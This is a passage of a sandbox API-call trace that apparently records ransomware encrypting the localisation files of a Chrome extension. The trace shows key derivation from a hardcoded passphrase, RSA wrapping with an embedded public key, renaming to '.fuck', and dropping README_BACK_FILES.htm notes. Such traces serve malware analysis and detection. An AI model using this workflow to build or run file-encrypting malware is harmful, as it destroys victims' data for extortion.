PublicKey.cbData=0x8c, PublicKey.pbData=0x2995c78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29855e0) returned 1 [0253.243] CryptEncrypt (in: hKey=0x29855e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.243] CryptEncrypt (in: hKey=0x29855e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2985ff8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2985ff8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.244] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2985ff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2985ff8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.245] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x11a, lpOverlapped=0x0) returned 1 [0253.246] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x11a, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0253.246] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0253.246] CloseHandle (hObject=0x5d60) returned 1 [0253.246] CloseHandle (hObject=0x5d5c) returned 1 [0253.246] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), bFailIfExists=0) returned 1 [0253.249] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json", dwFileAttributes=0x0) returned 1 [0253.250] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.gsg")) returned 1 [0253.251] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.fuck")) returned 1 [0253.252] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.252] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.252] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.252] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.252] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.252] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\readme_back_files.htm")) returned 0xffffffff [0253.253] AreFileApisANSI () returned 1 [0253.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.253] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.253] GetFileType (hFile=0x5d50) returned 0x1 [0253.253] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.255] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.255] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.255] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.255] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.255] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.255] GetLastError () returned 0x0 [0253.255] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json")) returned 0x20 [0253.255] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json", dwFileAttributes=0x80) returned 1 [0253.256] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.257] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.258] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.259] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.261] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.261] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.261] CryptHashData (hHash=0x29846a0, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.261] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.261] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.261] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.262] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2986a98) returned 1 [0253.262] CryptImportPublicKeyInfo (in: hCryptProv=0x2986a98, dwCertEncodingType=0x1, pInfo=0x2995280*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29952b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29952b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985620) returned 1 [0253.262] CryptEncrypt (in: hKey=0x2985620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.262] CryptEncrypt (in: hKey=0x2985620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986438*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986438*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.262] WriteFile (in: hFile=0x5d60, lpBuffer=0x2986438*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986438*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.263] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xeb, lpOverlapped=0x0) returned 1 [0253.264] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xeb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.264] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.265] CloseHandle (hObject=0x5d5c) returned 1 [0253.265] CloseHandle (hObject=0x5d60) returned 1 [0253.265] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), bFailIfExists=0) returned 1 [0253.268] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json", dwFileAttributes=0x0) returned 1 [0253.269] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.gsg")) returned 1 [0253.270] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.fuck")) returned 1 [0253.271] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.271] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.271] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.271] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.271] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.271] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\readme_back_files.htm")) returned 0xffffffff [0253.272] AreFileApisANSI () returned 1 [0253.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.272] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.272] GetFileType (hFile=0x5d50) returned 0x1 [0253.272] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.273] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.273] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.274] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.274] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.274] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.274] GetLastError () returned 0x0 [0253.274] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json")) returned 0x20 [0253.274] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json", dwFileAttributes=0x80) returned 1 [0253.275] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.276] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.276] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.277] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.279] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.279] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.279] CryptHashData (hHash=0x29846a0, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.279] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.279] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.279] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.279] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29867f0) returned 1 [0253.279] CryptImportPublicKeyInfo (in: hCryptProv=0x29867f0, dwCertEncodingType=0x1, pInfo=0x2995690*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29956c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29956c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29851a0) returned 1 [0253.279] CryptEncrypt (in: hKey=0x29851a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.280] CryptEncrypt (in: hKey=0x29851a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986108*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986108*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.280] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2986108*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986108*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.281] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd8, lpOverlapped=0x0) returned 1 [0253.282] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd8, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.282] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.282] CloseHandle (hObject=0x5d60) returned 1 [0253.282] CloseHandle (hObject=0x5d5c) returned 1 [0253.282] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), bFailIfExists=0) returned 1 [0253.286] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json", dwFileAttributes=0x0) returned 1 [0253.286] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.gsg")) returned 1 [0253.287] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.fuck")) returned 1 [0253.288] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.288] CryptDestroyKey 